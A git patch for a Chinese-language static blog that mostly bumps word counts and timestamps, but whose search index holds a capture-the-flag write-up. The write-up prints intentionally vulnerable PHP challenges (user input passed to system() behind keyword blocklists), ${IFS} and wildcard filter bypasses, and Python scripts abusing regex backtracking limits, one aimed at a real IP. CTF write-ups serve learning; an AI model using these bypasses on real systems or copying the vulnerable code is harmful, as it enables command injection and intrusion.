From 95a72c3d56ea7814763c88a40f7d22f87e31713b Mon Sep 17 00:00:00 2001
From: harmor123
Date: Sun, 29 Oct 2023 14:32:58 +0800
Subject: [PATCH] Site updated: 2023-10-29 14:32:57
---
2023/10/24/hello-world/index.html | 2 +-
2023/10/24/test/index.html | 5 +++--
404.html | 2 +-
archives/2023/10/index.html | 2 +-
archives/2023/index.html | 2 +-
archives/index.html | 2 +-
atom.xml | 4 ++--
index.html | 2 +-
search.xml | 2 +-
9 files changed, 12 insertions(+), 11 deletions(-)
diff --git a/2023/10/24/hello-world/index.html b/2023/10/24/hello-world/index.html
index 94b5b4b..751e0fe 100644
--- a/2023/10/24/hello-world/index.html
+++ b/2023/10/24/hello-world/index.html
@@ -1094,7 +1094,7 @@ 你的赏识是我前进的动力
站点总字数: 404
+ class="white-color">405
diff --git a/2023/10/24/test/index.html b/2023/10/24/test/index.html
index 3f80575..2826ff7 100644
--- a/2023/10/24/test/index.html
+++ b/2023/10/24/test/index.html
@@ -401,7 +401,7 @@ test
文章字数:
- 331
+ 332
@@ -445,6 +445,7 @@
+123
@@ -1097,7 +1098,7 @@ 你的赏识是我前进的动力
站点总字数: 404
+ class="white-color">405
diff --git a/404.html b/404.html
index 6b3189b..a17e465 100644
--- a/404.html
+++ b/404.html
@@ -454,7 +454,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/archives/2023/10/index.html b/archives/2023/10/index.html
index 20f02b1..9c751f8 100644
--- a/archives/2023/10/index.html
+++ b/archives/2023/10/index.html
@@ -682,7 +682,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/archives/2023/index.html b/archives/2023/index.html
index 912b80d..e0ef603 100644
--- a/archives/2023/index.html
+++ b/archives/2023/index.html
@@ -682,7 +682,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/archives/index.html b/archives/index.html
index c2f79d2..93b4265 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -682,7 +682,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/atom.xml b/atom.xml
index a4b444e..164823c 100644
--- a/atom.xml
+++ b/atom.xml
@@ -6,7 +6,7 @@
- 2023-10-29T04:28:17.636Z
+ 2023-10-29T06:32:34.600Z
https://harmor123.github.io/harmor.github.io/
@@ -21,7 +21,7 @@
https://harmor123.github.io/harmor.github.io/2023/10/24/test/
2023-10-24T12:25:59.000Z
- 2023-10-29T04:28:17.636Z
+ 2023-10-29T06:32:34.600Z
diff --git a/index.html b/index.html
index c0a6a42..51f3456 100644
--- a/index.html
+++ b/index.html
@@ -754,7 +754,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/search.xml b/search.xml
index 9ce8064..5a863df 100644
--- a/search.xml
+++ b/search.xml
@@ -8,7 +8,7 @@
/harmor.github.io/2023/10/24/test/
- 1.ez_rce1 2 3 4 5 6 7 8 9 10 11 12 13
| <?php
$rce = $_GET['rce']; if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; } } else { highlight_file(__FILE__); }
|
1 2 3 4 5 6 7 8 9 10 11
| ?rce=ls ?rce=cp${IFS}fla?.php${IFS}a.txt
<?php $flag = getenv('GZCTF_FLAG'); if($flag=="not_flag" or $flag==""){ $flag="dzctf{test_flag}"; }
?rce=ls${IFS}/ ?rce=cp${IFS}/fla?${IFS}a.php
|
2.ez_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| <?php error_reporting(0); highlight_file('./index.txt'); if(isset($_POST['c_ode']) && isset($_GET['num'])) { $code = (String)$_POST['c_ode']; $num=$_GET['num']; if(preg_match("/[0-9]/", $num)) { die("no number!"); } elseif(intval($num)) { if(preg_match('/.+?SHCTF/is', $code)) { die('no touch!'); } if(stripos($code,'2023SHCTF') === FALSE) { die('what do you want'); } echo $flag; } }
|
PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN
回溯法绕过正则匹配
1 2 3 4 5 6 7
| import requests url="http://112.6.51.212:31842/?num[]=1" data={ 'c[ode':'a'*1000000+'2023SHCTF' } r=requests.post(url,data=data) print(r.text)
|
本题与下面一道题进行对比:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| <?php
$as=$_POST['as']; $code = $_POST['code'];
function process($code){ return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code); }
if(!is_array($as)){
if(!preg_match_all('/but.*how/is',$as)){
if(strpos($as,'but how')!==false){ system(process($code)); }else{ die('tip: backup file there'); }
}else{ die('NO there'); } } ?>
|
1 2 3 4 5 6 7 8
| import requests url="" data={ 'as':'but how'+'a'*1000000, 'code':'sort /flflagag' } r=requests.post(url,data=data) print(r.text)
|
正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。
[PHP] strpos stripos strrpos strripos的区别-CSDN博客
]]>
+ 1.ez_rce1 2 3 4 5 6 7 8 9 10 11 12 13
| <?php
$rce = $_GET['rce']; if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; } } else { highlight_file(__FILE__); }
|
1 2 3 4 5 6 7 8 9 10 11
| ?rce=ls ?rce=cp${IFS}fla?.php${IFS}a.txt
<?php $flag = getenv('GZCTF_FLAG'); if($flag=="not_flag" or $flag==""){ $flag="dzctf{test_flag}"; }
?rce=ls${IFS}/ ?rce=cp${IFS}/fla?${IFS}a.php
|
2.ez_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| <?php error_reporting(0); highlight_file('./index.txt'); if(isset($_POST['c_ode']) && isset($_GET['num'])) { $code = (String)$_POST['c_ode']; $num=$_GET['num']; if(preg_match("/[0-9]/", $num)) { die("no number!"); } elseif(intval($num)) { if(preg_match('/.+?SHCTF/is', $code)) { die('no touch!'); } if(stripos($code,'2023SHCTF') === FALSE) { die('what do you want'); } echo $flag; } }
|
PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN
回溯法绕过正则匹配
1 2 3 4 5 6 7
| import requests url="http://112.6.51.212:31842/?num[]=1" data={ 'c[ode':'a'*1000000+'2023SHCTF' } r=requests.post(url,data=data) print(r.text)
|
本题与下面一道题进行对比:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| <?php
$as=$_POST['as']; $code = $_POST['code'];
function process($code){ return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code); }
if(!is_array($as)){
if(!preg_match_all('/but.*how/is',$as)){
if(strpos($as,'but how')!==false){ system(process($code)); }else{ die('tip: backup file there'); }
}else{ die('NO there'); } } ?>
|
1 2 3 4 5 6 7 8
| import requests url="" data={ 'as':'but how'+'a'*1000000, 'code':'sort /flflagag' } r=requests.post(url,data=data) print(r.text)
|
正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。
[PHP] strpos stripos strrpos strripos的区别-CSDN博客
123
]]>